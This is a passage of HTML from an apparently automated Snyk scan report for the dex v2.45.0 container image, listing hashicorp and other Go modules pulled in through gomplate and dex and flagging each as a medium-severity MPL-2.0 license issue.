<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:hashicorp:hcl:v2:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/hashicorp/hcl
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/hashicorp/hcl@v1.0.1-vault-7
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/hcl@v1.0.1-vault-7
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/hcl/hcl/token@v1.0.1-vault-7
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/hcl@v1.0.1-vault-7
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/hcl/hcl/token@v1.0.1-vault-7
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:hashicorp:hcl:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/hashicorp/golang-lru/simplelru
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/hashicorp/golang-lru/simplelru@v1.0.2
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/golang-lru/simplelru@v1.0.2
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:hashicorp:golang-lru:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/hashicorp/go-uuid
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/hashicorp/go-uuid@v1.0.3
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/go-uuid@v1.0.3
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:hashicorp:go-uuid:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/hashicorp/go-sockaddr
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/hashicorp/go-sockaddr@v1.0.7
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/go-sockaddr@v1.0.7
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/go-sockaddr/template@v1.0.7
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/go-sockaddr@v1.0.7
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:hashicorp:go-sockaddr:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/hashicorp/go-secure-stdlib/strutil
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/hashicorp/go-secure-stdlib/strutil@v0.1.2
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/go-secure-stdlib/strutil@v0.1.2
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:hashicorp:go-secure-stdlib:strutil:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/hashicorp/go-secure-stdlib/parseutil
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/hashicorp/go-secure-stdlib/parseutil@v0.2.0
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/go-secure-stdlib/parseutil@v0.2.0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/go-secure-stdlib/parseutil@v0.2.0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:hashicorp:go-secure-stdlib:parseutil:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/hashicorp/go-secure-stdlib/awsutil
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/hashicorp/go-secure-stdlib/awsutil@v0.3.0
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/go-secure-stdlib/awsutil@v0.3.0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:hashicorp:go-secure-stdlib:awsutil:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/hashicorp/go-rootcerts
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/hashicorp/go-rootcerts@v1.0.2
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/go-rootcerts@v1.0.2
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:hashicorp:go-rootcerts:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/hashicorp/go-retryablehttp
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/hashicorp/go-retryablehttp@v0.7.8
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/go-retryablehttp@v0.7.8
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/go-retryablehttp@v0.7.8
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:hashicorp:go-retryablehttp:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/hashicorp/go-multierror
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/hashicorp/go-multierror@v1.1.1
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/go-multierror@v1.1.1
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:hashicorp:go-multierror:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/hashicorp/go-immutable-radix
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/hashicorp/go-immutable-radix@v1.3.1
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/go-immutable-radix@v1.3.1
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:hashicorp:go-immutable-radix:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/hashicorp/go-cleanhttp
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/hashicorp/go-cleanhttp@v0.5.2
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/go-cleanhttp@v0.5.2
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/go-cleanhttp@v0.5.2
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:hashicorp:go-cleanhttp:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/hashicorp/errwrap
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/hashicorp/errwrap@v1.1.0
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/errwrap@v1.1.0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:hashicorp:errwrap:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/hashicorp/consul/api
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/hashicorp/consul/api@v1.33.2
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/hashicorp/consul/api@v1.33.2
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:hashicorp:consul:api:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/gosimple/slug
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/gosimple/slug@v1.15.0
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/gosimple/slug@v1.15.0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
